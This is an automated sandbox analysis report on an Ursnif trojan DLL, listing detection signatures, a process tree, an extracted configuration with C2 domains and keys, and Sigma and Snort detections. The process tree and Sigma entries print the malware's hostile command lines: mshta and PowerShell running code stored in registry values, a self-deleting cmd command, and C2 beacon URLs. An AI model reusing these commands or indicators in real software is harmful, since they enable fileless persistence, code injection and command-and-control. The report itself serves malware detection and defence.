Loading ...

Play interactive tourEdit tour

Windows Analysis Report 2u2mgtylJy.dll

Overview

General Information

Sample Name:2u2mgtylJy.dll
Analysis ID:498331
MD5:503edcfec2262373e36deaa37f640332
SHA1:37648e8ced69d8adc7be8bde5a61138cbb0f9e6a
SHA256:3ef3beaa49e07f171927a772a417109df6f137c4fa321dbd17daaa7cb47392be
Tags:dll
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: Powershell run code from registry
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sigma detected: Encoded IEX
Maps a DLL or memory area into another process
Writes to foreign memory regions
Writes or reads registry keys via WMI
Suspicious powershell command line found
Allocates memory in foreign processes
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7044 cmdline: loaddll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 7056 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7076 cmdline: rundll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 6268 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • rundll32.exe (PID: 7064 cmdline: rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Bonebegin MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7136 cmdline: rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Father MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7160 cmdline: rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Ratherdesign MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • control.exe (PID: 2988 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • mshta.exe (PID: 6260 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>K0qx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K0qx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6104 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 2920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 3912 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 1196 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD66D.tmp' 'c:\Users\user\AppData\Local\Temp\CSCCE0193F21C5D49109645DA91D5FFF210.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 488 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\w34iw342.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5760 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE022.tmp' 'c:\Users\user\AppData\Local\Temp\CSC919BED62534A4CC3BF2669B466E033B8.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 4436 cmdline: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\2u2mgtylJy.dll' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mshta.exe (PID: 5080 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Cbv5='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cbv5).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3212 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 3248 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yg5i0oy3.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6552 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES889.tmp' 'c:\Users\user\AppData\Local\Temp\CSCCED00F42533349BEA98D8A77AE340CD.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6908 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4z2qptpk.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6868 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1839.tmp' 'c:\Users\user\AppData\Local\Temp\CSC5471F709FE714810AB0D5625CD34D24.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "TQcvS5IrBIzT3+zGJZ6/B2cbmD8QQfXWsXQyoKLnldUl+fxloKcyGDdinb2QDD2PXD9XpRc5HbwrNqmPhmWJ0e/UBRwWUbictoSBMJ4aPIlTym7tmGSfnad7IPv5Srn06Y3XBZuYQ1Xys1ZxJwHplzKU0w90/qyyPVRqKOq/MLuCVIMXJCRzYsm45jCi3wlMV3wGL62NM3woVBhffjDDamQ53wj1axbnrsRRrHGvT3qf401ulwz8Ta2wR4uBYmHqgQhJz/9sbeghYJb5FWrjfTJDZcpuOb/2rXGCjZzLO89NTeNJJsLx8uenN3zhb+nnl/3yl1tkz3umoGAvkIUnqQXKMRLBu54y8WHgbT1gdAw=", "c2_domain": ["init.icecreambob.com", "app.updatebrouser.com", "fun.lakeofgold.com"], "botnet": "3500", "server": "580", "serpent_key": "34V2LBzJE8iG98YR", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.440873523.0000000003A58000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.471332372.00000000059D9000.00000004.00000040.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
          00000000.00000003.502219800.0000000004AA8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 55 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.3.rundll32.exe.2f18cd6.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              6.2.rundll32.exe.31b0000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                0.2.loaddll32.exe.f30000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  5.3.rundll32.exe.4ad8cd6.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    3.3.rundll32.exe.595a4a0.1.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                      Click to see the 16 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Encoded IEXShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>K0qx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K0qx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6260, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6104
                      Sigma detected: MSHTA Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>K0qx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K0qx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6260, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6104
                      Sigma detected: Mshta Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>K0qx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K0qx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6260, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6104
                      Sigma detected: Suspicious Csc.exe Source File FolderShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6104, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline', ProcessId: 3912
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>K0qx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K0qx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6260, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6104
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132780622454425957.6104.DefaultAppDomain.powershell

                      Data Obfuscation:

                      barindex
                      Sigma detected: Powershell run code from registryShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>K0qx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K0qx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6260, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6104

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000003.00000003.380707508.00000000032D0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "TQcvS5IrBIzT3+zGJZ6/B2cbmD8QQfXWsXQyoKLnldUl+fxloKcyGDdinb2QDD2PXD9XpRc5HbwrNqmPhmWJ0e/UBRwWUbictoSBMJ4aPIlTym7tmGSfnad7IPv5Srn06Y3XBZuYQ1Xys1ZxJwHplzKU0w90/qyyPVRqKOq/MLuCVIMXJCRzYsm45jCi3wlMV3wGL62NM3woVBhffjDDamQ53wj1axbnrsRRrHGvT3qf401ulwz8Ta2wR4uBYmHqgQhJz/9sbeghYJb5FWrjfTJDZcpuOb/2rXGCjZzLO89NTeNJJsLx8uenN3zhb+nnl/3yl1tkz3umoGAvkIUnqQXKMRLBu54y8WHgbT1gdAw=", "c2_domain": ["init.icecreambob.com", "app.updatebrouser.com", "fun.lakeofgold.com"], "botnet": "3500", "server": "580", "serpent_key": "34V2LBzJE8iG98YR", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
                      Antivirus detection for URL or domainShow sources
                      Source: http://init.icecreambob.com/c0EOvrV0qc5VSAwBXBa8q/dPW7TTNz1rcIbr1g/OGkQFSQW_2Bb_2B/CxLaOk_2FnPEARFaVw/Csb60MwQA/8Ypl3_2BWvnuCQW7vD8i/qdzylpoZqovaHq0DLVW/usKTeoNgbrF2w_2BDuaJdC/AKwpjjkO35n80/YGAxFnFT/q0_2FYrqQ4gjnchYC1nCbyF/Hp5QomuD7V/q_2FNrEW28WwhW5J3/evh_2FuGxsfW/FTakqhOgg0C/5jOddm5Nv3UnAe/3xfYM3v5ExQ_2BFLHBcHx/XxFQgyV8rJEGI_2B/SbbjLh_2FBHqXrD/63xNgkJW9N_2F4ADkn/Y6hvY_2Bp/meMPSPNF59dChat/emngAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/sv2O34qq/Kta1HvKsZ3tgM7tFYBomACu/mI6UagQ8wE/lYb6amh0XTBBLuSs2/uL4X3YpCek6i/1bj7_2BSpik/RZgu0vnHADL_2F/DGIXfo8xI_2Fn7H2kdqcK/qXQVYi0KeQpUICab/7iJEzXcfcMykGMx/EJryNKNs8qa83X8s7Y/7tfLoTfti/U8NCgomMwZYVXU814zuK/PzGEHqwSUIE_2B6HbQA/nZ16OvnVY6z_2B_2BbpXoo/EiIV_2FcZQIU_/2B_2FmU5/qne1F46TC0T7BPdNnwGtiCp/b9fo2Sp7mS/YC35VhxW_2F7DBQpp/ArbAVDFUHmnE/HIkiAjFrV16/J_2FNADvxnl/nNAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/6ekkhXb3MtuoC3_2FyvMu7l/0daElC7mOy/R6ZAlklcJ6nCEa1JG/77QHYRlDFZhY/CKh_2FHTF7b/anY3A4myrq9HMr/O0ixl1A9Ab9AH_2B1NpLR/OZcyW0ela3aJDPib/aDAo_2FD0usl4GG/4oFEpWmdLkMOuuyhNo/mbHFma2ju/jhqMzX7tDC0zN5vsOrlK/LJLMnBely6_2FcvVC3_/2BGwUD6Z4I7FCi_2F4cLgE/uWy6vjfOkNRx2/Rg68drga/pJzjEQy6uB0KP1_2FePOOmA/O6h7H3iuIm/pcPhmiBWtj4KTiWxG/SDfQhFDr6R3L/tcUc0BMyzZU/A0ixqYVRKBrNc/C6Avira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/mGUnO6XImcveA33xjh/RHKTTJs7w/ZXD5AGL8Z6b5Ydjn0EBf/EEGi_2B0P5BK3ftqfJ8/5Y3Dt3ILkK2tDhNHmvNVf_/2F6_2F9GG6nmd/AY3q5qlr/sduRVTyfg13io80O41ww0bD/nRvcHECqk0/hG_2B3Z8IlsbTadMs/jPEgqC11z_2F/jJ4I6p_2FzT/fAEznSbYmzFTCx/tlrGc2O52xjGLqfXmjqXa/6zgFstkYf810iRhc/DHMuTlvestji1tB/IFQcQqkY0w_2Fc2Xsv/6z833jFgl/JXYjGT9FPcN_2B_2FZhr/B_2FsGJxQAgoh7FOdw4/SNBrKAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/kk7MynOrZ2/z5Qh_2BFEZjQ9BqRe/l_2Bgh6swCWQ/Zdtmhdulegn/LFRgPgQWX6bTGy/Yy1zwx8XOzt5N3jy5Pcmz/ts9skZhrek9mZcWd/xn8wNPnE877ouqT/kBRevLD80b3Nerfvje/33yHfRtoq/EihB_2BQDiRYgQil4p84/D0DabPhF3qer2j9EJKn/WvoAJfNTpYAIRvXDTaZZDH/fUk_2BZih9cWP/r9VQkrFe/xqlWhFz_2BH7D5UWSdx5_2F/aZRLZpngni/St06qc8pfSPa4Smvv/1_2F3_2B3r2l/ptas5GP7wAZ/bcuDVyi8nVrKje/tpxJ_2BEDA1LSa1gW0Wq6/omxVTAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/uIg4rVau7E/pTOdpcWCqXLyW2Bb5/JVlWWIBKAi_2/FojTkl9LBdj/5NQUgJKju0RtNO/tzDm4s507_2F4kRlBxNQt/CqxnS5LJs3_2FGkx/6ujxicMmApQgR_2/FMWid4EYZr5bz4ddPN/IQ9nZpFjW/G2s2Nwqd9U74yv0lJk1Z/vtVoAMsIMmzYYMF6sq8/woVgKPwWZHePIzS0ff2CWr/hCbiWIGzzlF_2/FmwQ3_2F/eBtb4969HyiFKQjm86_2Fle/DPRDUjXUk5/_2F4UeWwjjX_2FtrJ/9zRp4NGcvnKV/V15fgxhlV6E/wQC8oVitxi5FBk/gvAuYUOLQwJUKJ5EjKZtE/tSYoFAvira URL Cloud: Label: malware
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F33FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_00F33FAB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_032E3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_032E3FAB
                      Source: 2u2mgtylJy.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: 2u2mgtylJy.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.504539296.0000000004BC0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.540765718.00000000064E0000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.504539296.0000000004BC0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.540765718.00000000064E0000.00000004.00000001.sdmp
                      Source: Binary string: c:\Baby\High\Ease\gener\side \Soon.pdb source: 2u2mgtylJy.dll

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49759 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49759 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49760 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49762 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49763 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49763 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49764 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49764 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49765 -> 194.147.86.221:80
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: init.icecreambob.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 194.147.86.221 80Jump to behavior
                      Source: Joe Sandbox ViewASN Name: NETRACK-ASRU NETRACK-ASRU
